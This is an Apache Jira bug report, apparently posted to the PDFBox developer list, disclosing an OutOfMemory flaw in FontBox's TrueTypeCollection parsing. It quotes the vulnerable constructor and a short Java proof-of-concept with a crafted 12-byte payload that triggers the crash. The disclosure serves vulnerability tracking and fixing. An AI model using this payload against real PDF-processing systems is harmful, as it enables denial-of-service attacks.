You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@pdfbox.apache.org by "Andreas Lehmkühler (Jira)" <ji...@apache.org> on 2021/11/26 07:42:00 UTC

[jira] [Created] (PDFBOX-5333) Wrong number of fonts leads to OOM-Exception

Andreas Lehmkühler created PDFBOX-5333:
------------------------------------------

             Summary: Wrong number of fonts leads to OOM-Exception
                 Key: PDFBOX-5333
                 URL: https://issues.apache.org/jira/browse/PDFBOX-5333
             Project: PDFBox
          Issue Type: Bug
          Components: FontBox
    Affects Versions: 2.0.24, 3.0.0 PDFBox
            Reporter: Andreas Lehmkühler
            Assignee: Andreas Lehmkühler
             Fix For: 2.0.25, 3.0.0 PDFBox


We got the following error report from through security@

+Description:+

In FontBox of Apache PDFBox, a carefully crafted PDF
file can trigger an OutOfMemory-Exception while loading the file. This
issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.

        Product: Apache PDFBox

        Version: 1.8-3.0.0-alpha2

        Affected component:
src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java

+Vulnerability:+
{code}
67     TrueTypeCollection(TTFDataStream stream) throws IOException
68    {
69        this.stream = stream;
70
71        // TTC header
72        String tag = stream.readTag();
73        if (!tag.equals("ttcf"))
74        {
75            throw new IOException("Missing TTC header");
76        }
77        float version = stream.read32Fixed();
78        numFonts = (int)stream.readUnsignedInt();     # Vulnerability
79        fontOffsets = new long[numFonts];                     #
Vulnerability
80        for (int i = 0; i < numFonts; i++)
81        {
82            fontOffsets[i] = stream.readUnsignedInt();
83        }
{code}

+Attack vector:+

{code}
import org.apache.fontbox.ttf.TrueTypeCollection;

import java.io.*;

public class main {
    public static void main(String[] args) throws IOException {
        byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00,
0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
        TrueTypeCollection ttc = new TrueTypeCollection(new
ByteArrayInputStream(payload));
    }
}
{code}




--
This message was sent by Atlassian Jira
(v8.20.1#820001)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@pdfbox.apache.org
For additional commands, e-mail: dev-help@pdfbox.apache.org